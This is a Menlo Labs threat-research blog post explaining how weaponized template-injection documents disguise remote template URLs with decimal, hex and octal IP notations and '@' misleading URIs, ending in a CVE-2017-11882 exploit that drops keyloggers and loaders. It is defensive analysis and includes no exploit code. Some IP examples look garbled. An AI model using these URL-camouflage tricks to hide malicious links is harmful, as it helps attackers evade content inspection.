Menlo Security Cloud Security Platform is FedRAMP® Authorized
Traditional security approaches are flawed, costly, and overwhelming for security teams. Menlo Security is different. It’s the simplest, most definitive way to secure work—making online threats irrelevant to your users and your business.
Our platform invisibly protects users wherever they go online. So threats are history and the alert storm is over.
Traditional network security wasn’t built to address today’s complex enterprise environments. SASE fixes that problem.
Menlo Labs provides insights, expertise, context and tools to aid customers on their journey to connect, communicate and collaborate securely without compromise. The collective is made up of elite security researchers that put a spotlight on the threats you know and don’t know about.
Menlo Labs provides insights, expertise, context and tools to aid customers on their journey to connect, communicate and collaborate securely without compromise.
Ashwin Vamshi | Oct 05, 2022
Share this article
The Menlo Labs research team recently published a blog on how weaponized template injection documents work and how to prevent them. Unless they have specific traces like malicious URLs or exploit markers, they often go undetected by security scanners.
As we continued our research into template injection attacks, we stumbled across several weaponized documents with an interesting camouflage technique hiding the URL to the naked eye. The documents contained a decimal IP address or used an obscure URL format for fetching the remotely hosted template.
As we mentioned in our previous post, the attacks are also noteworthy for the following reasons:
This blog details our findings on the camouflaged template injection attacks.
Usually, an IP address is represented with a dotted-decimal notation in the format XXX.XXX.XXX.XXX. Alternatively, IP addresses can also be represented using different notations.
Let’s show the different notations for IP addresses using an example of a google.com IP address, 188.8.131.52 (at the time of this writing):
In addition to the above, there is another notation, 0 optimized dotted-decimal notation, in which the 0s in an IP address are either suppressed or compressed.
For this example, let’s take the default gateway IP address used by routers: 192.168.0.1. The list below shows representations of 0 in the IP address that are optimized:
By default, most of these notations (except for the binary notation) are accepted by browsers. Using such notations can evade file-based content inspection engines, which look for a valid URL format.
Sounds complicated? Interesting? Wait!!!
It’s not over yet! Let’s dig into another part of this Pandora’s box.
While the IP address notations already pose a challenge to file-based content inspection engines, the use of obscure URLs makes inspection even more challenging. This method involves the use of the “@” userinfo subcomponent in the Uniform Resource Identifier (URI) schemes. Using this character, an obscure URL format or misleading URI can be created in the URI generic syntax format, leading to URI-based semantic attacks. For a better understanding, let’s take the same example of the google.com IP address. An example of a misleading URI can be https://[email protected]. This URL, when visited via the browser address bar, will resolve to google.com.
Here, “@” functions as a delimiter ignoring “test” and resolving to google.com. Additionally, it must also use the “://” authority component for creating a misleading URI.
The same functionality works for any number of “@” iterations:
This can also be performed with octal, hexadecimal, and decimal notations, such as https://test@0x8efac78e and https://@721078158. This turned out to be an interesting experiment for us. We identified that, except for the standard dotted-decimal notation, the octal, hexadecimal, and decimal/DWORD notations were treated as invalid links by most applications.
In addition, an attacker can also mask the malicious URL behind a benign URL. Let’s take a look at the following URLs as examples:
In all these examples, the URLs resolve to google.com — 192.168.1, 192.168.0.1, and youtube.com are not the actual URLs.
The use of browser-supported nonstandard IP notations and a misleading URI acts as camouflage.
An attacker can use the following methods to bypass content inspection engines that check for URLs:
These attacks are not new and have been used for more than a decade. In September 2020, Trustwave published details citing examples of such URL evasions. They explained the use of an encoded hexadecimal IP address format and a URL semantic attack that masked a shortened URL.
During our research, we identified camouflaged URLs used in weaponized template injection documents.
The templates were hosted in camouflaged URLs that were using the following:
We will share examples of these notations identified in our analysis.
The document we analyzed that used decimal notation URLs also contained several “.” and “-” characters as camouflage (see Figure 1).
The details of the file are as follows:
The decimal/DWORD 1806450061 in the URL is the equivalent of 184.108.40.206 in a dotted IP address format.
Another similar-looking document used the same decimal notation URL with several “.” and “-” characters. In addition, the attacker crafted a misleading URI semantic attack (see Figure 2).
As explained earlier, “@” functions as a delimiter ignoring “users” and taking “1806450061” into consideration. This resolves to the dotted IP address format 220.127.116.11.
Now the question is: Does this camouflage reveal automatically, without user intervention? The answer is Yes.
In both cases mentioned previously, upon opening the weaponized document, the camouflaged URL reveals itself and fetches the template from 18.104.22.168. An example of the packet capture during the execution of one such weaponized document is shown below (see Figure 3).
The weaponized documents downloaded a template containing an RTF exploit, CVE-2017-11882. This exploit contains a stack buffer overflow vulnerability in Equation Editor leading to remote code execution. Though this vulnerability has been patched, it still continues to be actively used.
During our analysis using the RTF exploit templates, the weaponized documents dropped malware like FormBook, Snake Keylogger, and SmokeLoader.
As explained in our previous article, customers using Menlo’s Cloud Security Platform powered by an Isolation Core™ are protected against template injection attacks by design. The Menlo Cloud Security Platform opens all documents downloaded from the Internet in the Isolation Core™, away from the user’s endpoint.
Menlo’s Safedoc feature strips out all the active content, thereby making sure that the malicious aspect is removed. The document is converted to a safe version. Policies can also be configured to ensure that all documents from the Internet are downloaded as a safe version.
This blog provided details about different IP address notations and semantic attacks that Menlo Labs has seen. Threat actors have taken advantage of this strategy in crafting browser-supported nonstandard notations. We showcased examples of weaponized template injection documents using this technique and also using “.” and “-” characters as a camouflage to the naked eye. This attack bypasses some file-based content inspection engines, which treat them as invalid links.
While we observed only a few camouflaged iterations in the template injection attacks, we expect to see more from this Pandora’s box.
Posted by Ashwin Vamshi on Oct 05, 2022
Tagged with Awareness, HEAT, Menlo Labs, RBI, Threat Trends, Web Security
Threat Trends & Research
To talk to a Menlo Security expert, complete the form, or call us at (650) 695-0695.